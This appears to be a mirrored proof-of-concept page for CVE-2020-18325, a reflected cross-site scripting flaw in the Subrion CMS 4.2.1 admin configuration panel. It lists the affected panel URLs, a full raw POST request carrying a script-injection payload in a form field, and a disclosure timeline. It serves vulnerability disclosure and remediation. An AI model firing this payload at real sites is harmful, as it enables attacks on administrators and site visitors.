Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2020-18325 PoC — Subrion CMS 跨站脚本漏洞

Source
https://github.com/hamm0nz/CVE-2020-18325
Associated Vulnerability
Title:Subrion CMS 跨站脚本漏洞 (CVE-2020-18325)
Description:Subrion CMS是Subrion团队的一套基于PHP的内容管理系统(CMS)。该系统可被集成到网站,并支持多种扩展插件等。 Subrion CMS 4.2.1 中存在安全漏洞,该漏洞允许攻击者通过配置面板进行攻击。
Description
Exploit PoC for CVE-2020-18325
Readme

# Multilple Cross Site Scripting (XSS) vulnerability exists in Intelliants Subrion CMS v4.2.1 in the Configuration panel. 
# Description
Subrion CMS is easy to install and simple to manage. Use it as a stand-alone application or in conjunction with other applications to create entry level sites, mid-sized or large sites.

Multiple Reflected Cross-site Scripting vulnerabilities were discovered in the Subrion CMS v.4.2.1 configuration panel, allowing a remote attacker to inject arbitrary JavaScript. 

**Date**: 27-02-2022 \
**Software Link:** https://subrion.org \
**Exploit Author**: HaMM0nz \
**CVE**: CVE-2020-18325 \
**Category:** Web Application \
**Affected URL**
- /panel/configuration/pictures/
- /panel/configuration/mail/
- /panel/configuration/miscellaneous/
- /panel/menus/add/
# Proof of Concept 
POST /panel/configuration/pictures/ HTTP/1.1 \
Host: 172.16.63.129 \
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:56.0) Gecko/20100101 Firefox/56.0 \
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 \
Accept-Language: en-US,en;q=0.5 \
Accept-Encoding: gzip, deflate \
Referer: http://172.16.63.129/panel/configuration/pictures/ \
Content-Type: multipart/form-data; boundary=---------------------------17647740521660843247800008623 \
Content-Length: 5605 \
Connection: close \
Cookie: INTELLI_7da515443a=2hen33trbsgsadue2rgcti4sr1; loader=loaded \
Upgrade-Insecure-Requests: 1 

-----------------------------17647740521660843247800008623 \
Content-Disposition: form-data; name="__st" 

t9eQz0wrvfrlVO1rNDO9ZbPOB3mDmkNw8k17yS6f \
-----------------------------17647740521660843247800008623 \
Content-Disposition: form-data; name="c[image_quality]" 

1 \
-----------------------------17647740521660843247800008623\
Content-Disposition: form-data; name="v[image_quality]" 

75 \
-----------------------------17647740521660843247800008623 \
Content-Disposition: form-data; name="c[allow_animated_gifs]" \
1 \
-----------------------------17647740521660843247800008623 \
Content-Disposition: form-data; name="v[allow_animated_gifs]" \
0 \
-----------------------------17647740521660843247800008623 \
Content-Disposition: form-data; name="v[allow_animated_gifs]" \
test"><script>alert(1)</script>1qazx 

# Timeline
**Discovery and report** : 24 June 2019 \
**CVE ID was assigned** : 11 Aug 2021 \
**Public** : 27 February 2022
# Solution
Consider complying to the OWASP's XSS prevention guidelines. (https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)
File Snapshot

 [4.0K]  /data/pocs/813745c31bf0d20db929cd7197ec3dcc7fe22594
└── [2.5K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.